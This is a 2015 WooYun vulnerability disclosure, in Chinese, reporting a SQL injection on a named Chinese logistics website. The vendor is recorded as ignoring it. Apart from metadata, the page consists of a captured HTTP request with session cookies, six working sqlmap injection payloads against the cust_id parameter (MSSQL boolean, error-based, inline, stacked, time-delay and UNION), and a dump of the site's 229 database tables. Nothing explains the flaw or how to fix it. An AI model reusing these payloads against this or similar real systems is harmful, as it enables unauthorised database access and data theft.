当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0153405

漏洞标题:中国物通网某站存在SQL注入

相关厂商:中国物通网

漏洞作者: 路人甲

提交时间:2015-11-11 10:21

修复时间:2015-11-24 07:14

公开时间:2015-11-24 07:14

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-11: 细节已通知厂商并且等待厂商处理中
2015-11-24: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

POST /Ashx/GetWshi.ashx?companyName=%25u4E91%25u5357%25u6B63%25u901A%25u5FB7%25u4FE1%25u8D27%25u8FD0%25u6709%25u9650%25u516C%25u53F8&cust_id=1072364&pid=1&wshiCity=%25u4E91%25u5357%25u7701%25u6606%25u660E%25u5E02 HTTP/1.1
Content-Length: 485
Content-Type: application/x-www-form-urlencoded
Cookie: ASP.NET_SessionId=xmz5ifblol3dv4qgymnrpd00; TemGold_1072364=1,14,4,3,5,6,11,12,10,13; TemFormat_1072364=lsrb; BAIDUID=8E474BC330333966DD7B0C2263535823:FG=1; Hm_lvt_b056f6db54a055cf5bfde997b9ed913f=1447121410,1447121416,1447121458,1447121708; Hm_lpvt_b056f6db54a055cf5bfde997b9ed913f=1447121708; Hm_lvt_d653978debccea19667b401ab77ac0ad=1447121410,1447121416,1447121458,1447121708; Hm_lpvt_d653978debccea19667b401ab77ac0ad=1447121708; HMACCOUNT=A63704B16C8F6603
Host: ynztwl.chinawutong.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
companyName=%25u4E91%25u5357%25u6B63%25u901A%25u5FB7%25u4FE1%25u8D27%25u8FD0%25u6709%25u9650%25u516C%25u53F8&cust_id=123&kind=%25u914D%25u8D27%25u4FE1%25u606F%25u90E8&pid=1&random=0.7215899890288711&toCity=%25u94DC%25u5DDD%25u5E02&toPro=%25u9655%25u897F%25u7701&wshiCity=%25u4E91%25u5357%25u7701%25u6606%25u660E%25u5E02

1.png

2.png

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: cust_id (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: companyName=%u4E91%u5357%u6B63%u901A%u5FB7%u4FE1%u8D27%u8FD0%u6709%u9650%u516C%u53F8&cust_id=123 AND 8050=8050&kind=%u914D%u8D27%u4FE1%u606F%u90E8&pid=1&random=0.7215899890288711&toCity=%u94DC%u5DDD%u5E02&toPro=%u9655%u897F%u7701&wshiCity=%u4E91%u5357%u7701%u6606%u660E%u5E02
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: companyName=%u4E91%u5357%u6B63%u901A%u5FB7%u4FE1%u8D27%u8FD0%u6709%u9650%u516C%u53F8&cust_id=123 AND 4256=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(98)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (4256=4256) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(113)+CHAR(113)))&kind=%u914D%u8D27%u4FE1%u606F%u90E8&pid=1&random=0.7215899890288711&toCity=%u94DC%u5DDD%u5E02&toPro=%u9655%u897F%u7701&wshiCity=%u4E91%u5357%u7701%u6606%u660E%u5E02
Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: companyName=%u4E91%u5357%u6B63%u901A%u5FB7%u4FE1%u8D27%u8FD0%u6709%u9650%u516C%u53F8&cust_id=(SELECT CHAR(113)+CHAR(118)+CHAR(98)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (1280=1280) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(113)+CHAR(113))&kind=%u914D%u8D27%u4FE1%u606F%u90E8&pid=1&random=0.7215899890288711&toCity=%u94DC%u5DDD%u5E02&toPro=%u9655%u897F%u7701&wshiCity=%u4E91%u5357%u7701%u6606%u660E%u5E02
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: companyName=%u4E91%u5357%u6B63%u901A%u5FB7%u4FE1%u8D27%u8FD0%u6709%u9650%u516C%u53F8&cust_id=123;WAITFOR DELAY '0:0:5'--&kind=%u914D%u8D27%u4FE1%u606F%u90E8&pid=1&random=0.7215899890288711&toCity=%u94DC%u5DDD%u5E02&toPro=%u9655%u897F%u7701&wshiCity=%u4E91%u5357%u7701%u6606%u660E%u5E02
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: companyName=%u4E91%u5357%u6B63%u901A%u5FB7%u4FE1%u8D27%u8FD0%u6709%u9650%u516C%u53F8&cust_id=123 WAITFOR DELAY '0:0:5'&kind=%u914D%u8D27%u4FE1%u606F%u90E8&pid=1&random=0.7215899890288711&toCity=%u94DC%u5DDD%u5E02&toPro=%u9655%u897F%u7701&wshiCity=%u4E91%u5357%u7701%u6606%u660E%u5E02
Type: UNION query
Title: Generic UNION query (NULL) - 11 columns
Payload: companyName=%u4E91%u5357%u6B63%u901A%u5FB7%u4FE1%u8D27%u8FD0%u6709%u9650%u516C%u53F8&cust_id=123 UNION ALL SELECT NULL,CHAR(113)+CHAR(118)+CHAR(98)+CHAR(112)+CHAR(113)+CHAR(104)+CHAR(109)+CHAR(84)+CHAR(87)+CHAR(97)+CHAR(101)+CHAR(66)+CHAR(101)+CHAR(90)+CHAR(97)+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(113)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &kind=%u914D%u8D27%u4FE1%u606F%u90E8&pid=1&random=0.7215899890288711&toCity=%u94DC%u5DDD%u5E02&toPro=%u9655%u897F%u7701&wshiCity=%u4E91%u5357%u7701%u6606%u660E%u5E02
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
Database: Wutong
[229 tables]
+----------------------------------------+
| AIRPORT |
| Admin |
| Appraise |
| BlackList |
| CARRIER |
| CW_Device |
| CarLineUrl |
| Cert_Car |
| ChengYunOrder |
| ClickLog |
| CoPicture |
| Collect_Car |
| Collect_Car |
| Coupons |
| CustLink |
| CustLocation |
| DiaoCha |
| DomainList |
| EmailTriggerRecord |
| Emails |
| GY_CharityCom |
| GY_EmergencyContact |
| GY_EmergencyGoods |
| GY_contribute |
| GY_help |
| GY_safety |
| GY_searchPerson |
| GjHuo |
| Gonggao |
| GoodsDetail |
| GpsAuthorization |
| GpsInfo |
| HRAbility |
| HRCoverLetter |
| HREducation |
| HRExperience |
| HRFavJob |
| HRFavSeeker |
| HRJobCityPK |
| HRJobs |
| HRPostSeekerPK |
| HRSeekerCompayPK |
| HRSeekerCompayPK |
| HRTrain |
| HighlyRecommend |
| HotmainLine |
| IDcardCheck |
| IMEI |
| ImgLocation |
| InterAir |
| InterAirReq |
| InterLine |
| InterShipping |
| InterShippingReq |
| LISTAreas |
| LP_AD |
| LP_AutoRepair |
| LP_Bath |
| LP_CarPark |
| LP_Catering |
| LP_Culture |
| LP_Hotel |
| LP_HouseRent |
| LP_LogisticsCom |
| LP_Merchants |
| LP_News |
| LP_NewsType |
| LP_Show |
| LP_TemplateAD |
| LP_WearHouse |
| LoginRecord |
| LongSourceHY |
| LongSourceHY |
| MSpeer_conflictdetectionconfigrequest |
| MSpeer_conflictdetectionconfigresponse |
| MSpeer_lsns |
| MSpeer_originatorid_history |
| MSpeer_request |
| MSpeer_response |
| MSpeer_topologyrequest |
| MSpeer_topologyresponse |
| MSpub_identity_range |
| MailTemp |
| MemberLogin |
| ModelKey |
| Nations |
| NewsCata |
| NewsCata |
| NewsClass |
| NewsData |
| OwnerContract |
| OwnersInsurance |
| PageNum |
| PayLog |
| Picture_Licence |
| Product |
| RankOne |
| RankTwo |
| Refuse_Collect |
| ReturnPwd |
| SEAPORT |
| SMT_ypxxone |
| SMT_ypxxtwo |
| SendEmailRecord |
| ServiceRecord |
| SourceRecord |
| Temp |
| TenderDocument |
| TextLocation |
| TopContacts |
| TopGoods |
| TuiSong |
| Url_Gj |
| Url_Query |
| UserGPS |
| VI_CarLine |
| VI_SpecialLinePH |
| VI_SpecialLinePH |
| VI_Wshi |
| Vi_Company |
| Vi_HRApplySeeker |
| VoicWshi |
| WapLog |
| WebBlackUser |
| WebLink |
| WebLog |
| WliuZbiao |
| adminrizhi |
| androidImg |
| android_Activities |
| android_Products |
| android_Recommend |
| banjia |
| bshi |
| bumen |
| bx_CusInsureInfo |
| bx_ParamsInsureInfo |
| bx_categories |
| bx_conveyances |
| bx_packages |
| bx_plan |
| bx_points |
| bx_xyzBackContent |
| caiwu |
| cheLine |
| chezhu |
| china_ad |
| com |
| config |
| daili |
| dtproperties |
| goq_Company |
| gpsUserInfo |
| huiyuan |
| huoOld |
| huo_order |
| huo_order |
| huo_print |
| huodong_order |
| infomationAppraise |
| jiameng_order |
| jianli |
| jop |
| keshi |
| ksheng |
| kshi |
| kuaijian |
| link |
| message |
| pay_information |
| powerUnit |
| push_CustomerTempThemes |
| push_CustomerTopic |
| push_QuartzTable |
| push_Themes |
| push_autoPublish |
| push_roborder |
| qiyeView |
| qiyepic |
| qiyepic |
| renzheng_geren |
| renzheng_qiye |
| rolePower |
| sqlmapoutput |
| syncobj_0x3032423438383034 |
| syncobj_0x3439373531363345 |
| syncobj_0x3531423844353443 |
| syncobj_0x3630373132373946 |
| syncobj_0x3637443233313437 |
| syncobj_0x3739364335463539 |
| syncobj_0x3846364531304330 |
| syncobj_0x3846423930423839 |
| syncobj_0x3934324143354645 |
| syncobj_0x3938453936374632 |
| syncobj_0x4434363133443337 |
| syncobj_0x4438333843394444 |
| syncobj_0x4633453042374444 |
| sysarticlecolumns |
| sysarticles |
| sysarticleupdates |
| sysdiagrams |
| sysextendedarticlesview |
| syspublications |
| sysreplservers |
| sysschemaarticles |
| syssubscriptions |
| systranschemas |
| tb_BuyInfor |
| tb_OneLeve |
| tb_SupplyInfor |
| tb_TwoLeve |
| tc_car |
| tem_userset |
| userPower |
| view_Prize |
| wsheng |
| wshiLinShi |
| wshiLinShi |
| wshiMainlineLinShi |
| wshiMainline_Price |
| wshiMainline_Price |
| wshiOrder |
| wxt_dd |
| yanzheng_jiashi |
| yanzheng_xingshi |
| ygrizhi |
| yuangong |
| zhaoshang |
| zhengshu |
+----------------------------------------+

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-11-24 07:14

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无